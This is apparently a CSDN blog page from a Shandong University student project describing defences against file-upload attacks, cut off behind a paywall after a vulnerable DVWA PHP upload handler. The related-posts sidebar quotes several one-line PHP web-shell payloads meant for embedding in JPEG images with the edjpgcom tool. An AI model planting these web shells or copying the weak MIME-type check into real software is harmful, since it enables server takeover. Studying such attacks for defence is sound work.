山东大学软件学院项目实训-创新实训-SDUMeeting(三)

已于 2022-04-22 19:55:34 修改
阅读量358 收藏
点赞数
分类专栏: 项目实训 文章标签: 网络安全
于 2022-04-22 19:49:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_54743939/article/details/124283654
版权
本文详述了山东大学软件学院项目实训中关于web安全的实践,特别是针对文件上传攻击的防御措施。从限制文件类型和大小、检查文件头到采用重命名和Anti-CSRF token防止CSRF,逐一解析了防止文件注入漏洞的方法。
摘要由CSDN通过智能技术生成

山东大学软件学院项目实训-创新实训-SDUMeeting(三)

山大会议项目web安全之文件注入防护

一、前言

山大会议的客户端加入了对用户自定义头像的支持,需要用户自行上传头像图片,这个过程存在文件注入漏洞,这篇文章记录解决文件注入漏洞的过程。

二、文件上传攻击防御方法

这里介绍了文件上传攻击防御方法,以dvwa为环境演示
1) 对上传文件的类型、大小做限制
漏洞:可以只改文件后缀,不改变文件内容,然后通过burpsuit抓包将文件再改回原来的后缀
难度(Medium)
审计代码

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
   
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

    // Is it an image?
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
        ( $uploaded_size < 100000 ) ) {
   

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
   
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
   
            // Yes!
            echo "<pre>{
     $target_path} succesfully uploaded!</pre>";
        }
最低0.47元/天 解锁文章
m0_54743939
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
山东大学光电工程实训-物理光学实验报告与总结
07-07
山东大学光电工程实训-物理光学实验报告与总结》 本次实训主要涵盖了物理光学的大核心概念:光的衍射、干涉与偏振。实验旨在加深对这些基本光学现象的理解,以及掌握基本光学实验的操作技巧。 一、光的衍射 ...
山东大学光电工程实训-几何光学实验报告与总结
07-07
山东大学光电工程实训-几何光学实验】 几何光学是光学的一个基本分支,主要研究光在传播过程中的直进性质和光路的可逆性。在山东大学的光电工程实训课程中,学生通过一系列实验深入理解和掌握几何光学的基本原理...
edjpgcom 使用方法和下载
myidea999的博客
02-21 9351
把图片拖动到edjpgcom.exe上,然后弹框内写入指令 下载链接:链接: https://pan.baidu.com/s/1ksyleLk034AGKmiy9E8a9A 提取码: caep
edjpgcom工具使用方法
qq_41674664的博客
04-22 1749
edjpgcom工具使用方法 如何把代码或一句话写入图片中 准备图片1.JPG,利用edjpgcom工具把代码写入图片 <?fputs(fopen("shell10.php","w"),'<?php eval($_POST[gmd]);?>')?> 或者使用命令将木马代码写入图片中 图片木马 方法一: windows命令: 注意:将php文件和图片文件放到同一...
edjpgcom生成一句话图片木马
weixin_43294413的博客
07-02 1248
首先,我们从网上下载edjpgcom工具(网上的一些百度云盘会有大佬分享),然后下载一张图片(建议小一点的图片) 将图片用鼠标拖到edjpgcom.exe的程序上,会出现如下的弹窗,然后将编写的一句脚本写入,点击ok即可. <?fputs(fopen("shell1.php","w"),'<?php @eval($_POST[caidao]);?>')?> 查看图片,用记事本打开图片,检查脚本是否写入图片中. ...
DVWA-文件上传(File Upload
weixin_58954236的博客
08-20 807
指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。
文件包含漏洞(本地包含)
Xiongcanne的博客
04-25 992
第一步:制作图片木马(所需工具edjpqcom.exe) 将一个jpg文件拖入edjpgcom.exe 输入在含有文件包含漏洞文件夹中创建一句话木马的命令: <?fputs(fopen("shell20.php","w"),'<?php eval($_POST[xc]);?>')?> xc为连接木马密码 成功创建图片木马 使用靶机上传该jpg木马 使用文件包含漏洞包含该j...
山东大学软件学院项目实训-创新实训-时空漫游(一)
最新发布
qq_62815101的博客
04-18 1511
在当今迅速变化的数字时代,AIGC(人工智能生成内容)和VR(虚拟现实)技术正成为推动移动终端应用革新的关键动力。这些前沿技术的融合不仅提升了移动设备的能力,而且开辟了新的交互和内容创作方式,引领着技术的未来发展方向。随着5G网络的普及和AI技术的突破,我们正见证着移动终端设备性能的巨大飞跃。这些技术的结合为移动设备带来了前所未有的计算能力和连接速度,使得高级交互和复杂内容创作成为可能。在这一过程中,VR技术以其独特的沉浸式体验特性,为用户打开了一个全新的虚拟世界大门,让他们能够以全新的方式体验和互动。
山东大学光电工程实训-红外测温枪装调实践训练实验报告与总结
07-07
山东大学光电工程实训-红外测温枪装调实践训练实验报告与总结】 红外测温枪装调实践训练是光电工程领域的一项重要实践教学活动,旨在让学生深入理解红外测温技术及其应用。在这个实训中,学生不仅要掌握红外测温...
毕设&课设&项目&实训-山大树洞 SDU Web 技术 小组课程作业 前端部分.zip
02-03
可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【附加价值】: 项目具有较高的学习借鉴价值,也可直接拿来修改复刻。 对于有一定基础或热衷于研究的人来说,可以在这些基础代码上进行修改和扩展,...
edjpgcom.exe
08-09
edjpgcom is a free Windows application that allows you to change (or add) a JPEG commment in a JPEG file. That's all it does. All other fields in a JFIF or Exif file are left untouched. It even keeps the filesystem timestamp! It's based on the rdjpgcom and wrjpgcom utilities from the Independent JPEG Group's 6b distribution. (Heck, it's essentially these two programs combined with a basic dialog control.)
edjpgcom(适合用于Local File Inclusion Vulnerability)
12-10
edjpgcom(适合用于Local File Inclusion Vulnerability) edjpgcom可在JPG文件中插入注释, 而不会损坏原来的文件(即插入内容后图片任可浏览), 适合用于Local File Inclusion Vulnerability milw0rm有动画 http://milw0rm.org/video/watch.php?id=57 有篇文章也有用到,搜“又一上传突破” 百度Google直接“edjpgcom”貌似找不到,搜“jpg comment edit”
edjpgcom图片一写入木马小工具
03-17
edjpgcom图片一写入木马小工具,文件上传漏洞与文件包含漏洞进行渗透测试必备工具,软件仅供研究测试,严禁非法使用!!!
edjpgcom图片插入一句话工具
02-12
edjpgcom图片插入一句话工具
edjpgcom图片插入一句话工具(1).rar
04-08
这是让图片带有小马的一键生成工具,有需要的可以自己下。挺好用的一个小程序,如果你也想成为一个白帽,可以先拿这个练练手。
山东大学光电工程实训-基于投影仪的基本光学实验报告与总结
07-07
山东大学光电工程实训-基于投影仪的基本光学实验报告与总结】 本次实验主要涉及光电工程中的基础光学原理,包括投影仪的工作原理、光学组件的拆解与组装、复色光的形成与分光原理,以及偏振消光的理论与实践。...
使用edjpgcom工具制作一句话图片木马
Fly_鹏程万里
02-12 7652
下载地址:https://download.csdn.net/download/fly_hps/10954098 使用演示: 拖动1.jpg这个正常的图片文件到edjpgcom.exe上,之后在“$_POST['一句话内容']”,之后点击ok,即可实现对1.jpg图片插入一句话木马! 查看图片文件: 工具短小精悍!...
渗透测试入门中的入门(配置工具)
寂寞的流星雨
12-04 390
链接:https://pan.baidu.com/s/1bz8nPDgiTzvsi1p5Mf32CQ?1、burpsuite(linux下安装)2、安装虚拟机 ,官网下载 VMware17 pro。绝大多数必须文件都在里面,会持续更新,更新中。4、edjpgcom程序。1、靶机(OWAPS)2、攻击机(kali)1、安装Xshell。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值